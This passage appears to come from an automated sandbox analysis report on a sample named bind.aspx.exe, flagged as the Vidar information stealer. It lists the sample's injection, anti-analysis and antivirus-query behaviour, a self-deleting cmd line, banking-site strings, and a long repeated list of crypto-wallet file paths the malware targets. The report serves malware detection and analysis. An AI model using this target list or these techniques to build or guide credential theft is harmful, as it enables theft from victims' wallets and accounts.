                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003532CD wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_003532CD
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00349B56 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00349B56
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034B957 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034B957
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003413B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_003413B4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00353FEA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00353FEA
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00349633 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00349633
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00353C2D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00353C2D
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034A2AF wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0034A2AF
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00349305 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_00349305
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003536A9 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_003536A9
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034EA52 GetSystemInfo,wsprintfA,4_2_0034EA52
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000363C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6RECOVE~1vebrokerRecoveryImprovedomVMware20,11696492231}
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: FIDAFC.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: FIDAFC.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000363C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696492231}
                    Source: FIDAFC.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.0000000003570000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.0000000003525000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: FIDAFC.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: FIDAFC.4.drBinary or memory string: discord.comVMware20,11696492231f
                    Source: FIDAFC.4.drBinary or memory string: global block list test formVMware20,11696492231
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: FIDAFC.4.drBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: FIDAFC.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: FIDAFC.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: FIDAFC.4.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: FIDAFC.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: FIDAFC.4.drBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: FIDAFC.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: FIDAFC.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: FIDAFC.4.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: FIDAFC.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: FIDAFC.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: FIDAFC.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\bind.aspx.exeAPI call chain: ExitProcess graph end nodegraph_4-87759
                    Source: C:\Users\user\Desktop\bind.aspx.exeAPI call chain: ExitProcess graph end nodegraph_4-89124
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035A4A4 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0035A4A4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035549F EntryPoint,LoadLibraryA,GetProcAddress,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,OpenEventA,CloseHandle,OpenEventA,CreateEventA,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,ExitProcess,4_2_0035549F
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00355BA7 mov eax, dword ptr fs:[00000030h]4_2_00355BA7
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034B030 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA,memset,4_2_0034B030
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035A4A4 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0035A4A4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035AADF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0035AADF
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,4_2_61EAF900
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,4_2_61EAF8FC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: bind.aspx.exe, type: SAMPLE
                    Source: Yara matchFile source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034DD03 memset,memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0034DD03
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034FD18 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0034FD18
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034FDF3 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0034FDF3
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00341000 cpuid 4_2_00341000
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0034E8FE
                    Source: C:\Users\user\Desktop\bind.aspx.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00358422 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,4_2_00358422
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034E7E4 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_0034E7E4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034E8AB GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0034E8AB
                    Source: C:\Users\user\Desktop\bind.aspx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\bind.aspx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: bind.aspx.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \ElectronCash\wallets\
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: info.seco
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session 